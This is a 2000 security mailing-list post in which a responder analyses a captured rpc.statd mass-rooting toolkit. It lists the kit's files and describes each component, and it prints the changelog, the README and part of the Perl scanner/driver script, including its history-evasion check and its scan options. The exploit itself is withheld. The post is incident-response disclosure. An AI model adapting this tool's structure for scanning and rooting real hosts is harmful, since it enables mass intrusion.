Security Incidents mailing list archives
More info regarding: std.pl, the rpc.statd linux mass rooter
From: marc <marc () ZOUNDS NET>
Date: Fri, 15 Dec 2000 09:36:44 -0600
I've heard different things from a lot of people about this. I do not feel comfortable posting the script itself, but I will post some additional information about it. The perl script does not look like an amatuer job, it has some good coding and error checking. And it worked well at finding and compromising boxes, there were quite a few logged when we found it. I will take the full script and send it to CERT, who has requested a copy, but I do not plan to distribute it to anyone else. -rw-rw-r-- 1 marc marc 19 Nov 29 02:36 .config -rw-rw-r-- 1 marc marc 105 Nov 30 01:29 207.92.root -r-------- 1 marc marc 430 Oct 30 01:33 CHANGES -r-------- 1 marc marc 107 Oct 22 02:26 README -r-x------ 1 marc marc 320 Oct 13 22:23 config -r-x------ 1 marc marc 15457 Oct 13 18:33 no -r-x------ 1 marc marc 7273 Aug 7 21:46 pc -rwxr-xr-x 1 marc marc 19438 Oct 14 00:36 st -rwxrwx--- 1 marc marc 6171 Oct 30 01:32 std.pl 207.92.root: ASCII text CHANGES: English text README: English text config: Bourne shell script text no: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped pc: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped st: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped std.pl: perl commands text pc is the port scanner. The script has it search for only port 111. no is a notify daemon. (?) st is the exploit to root the box and leave the rootshell. std.pl is the perl script that runs the show. :::::::::::::: CHANGES :::::::::::::: Change log 0.2 -> 0.2+p1: - multiple copies can run on one server now - cleaned up the script, converted most system() commands into real perl - added signal handler - made more verbose errors - auto random scans now reloops through the file, doesn't spawn children of the script anymore 0.2+p1 -> 0.2+p2: - fixed a big prob in +p1 that made the script not work 0.2+p2 -> 0.2+p3: - fixed a minor prob, nothing worth mentioning :::::::::::::: README :::::::::::::: Before using std.pl you must run ./config to set required values or the script will not function properly. :::::::::::::: std.pl :::::::::::::: #!/usr/bin/perl # # std.pl v0.2+p3 by KraZee - 10.30.00 private # rpc.statd linux mass rooter [epic] # # binds rootshell on port 24765 on exploited hosts # standard disclaimers apply # # DO NOT DISTRIBUTE !! DO NOT DISTRIBUTE $numofargs=@ARGV; $option=@ARGV[0]; $prefix=@ARGV[1]; $auto=@ARGV[2]; use File::Basename; $progname=basename($0); $SIG{INT}=\&catch_sig; $hist=$ENV{HISTFILE}; $histlength=length($hist); print "\nstd.pl v0.2+p3 private - by KraZee\nrpc.statd linux mass rooter\n\n"; if ($histlength != "0" && $hist ne "/dev/null") { print "naughty boy you forgot to redirect HISTFILE\n\n"; } if (not -e ".config") { print "* error: configuration not set, run ./config\n\n"; exit; } else { unless(open (CONFIG, "< .config")) { &cleanup; die "* error, unable to read configuration: $!\n\n"; } $config=""; $config=<CONFIG>; chop $config; ($ip, $childs)=split(" ", $config); close(CONFIG); if ($ip eq "" || $childs == "") { ... sub help { print "usage: $progname <options> <subnet/iplist>\n\n"; print "configuration:\n"; print "server: $ip childs: $childs\n\n"; print "options:\n"; print "-s scan class b/c subnet\n"; print "-f scan ips in ip database (no hostnames!)\n"; print "-r scan random class b's (specify class a)\n"; print "use '-r <class a> auto' to loop new scans\n\n"; }
Current thread:
- possible new tool: std.pl, the rpc.statd linux mass rooter (fwd) marc (Dec 15)
- Re: possible new tool: std.pl, the rpc.statd linux mass rooter (fwd) Niels Heinen (Dec 15)
- Re: possible new tool: std.pl, the rpc.statd linux mass rooter (fwd) claymore (Dec 15)
- More info regarding: std.pl, the rpc.statd linux mass rooter marc (Dec 16)
- Re: possible new tool: std.pl, the rpc.statd linux mass rooter (fwd) claymore (Dec 15)
- weird DNS logs K 0 (Dec 15)
- Re: possible new tool: std.pl, the rpc.statd linux mass rooter (fwd) Niels Heinen (Dec 15)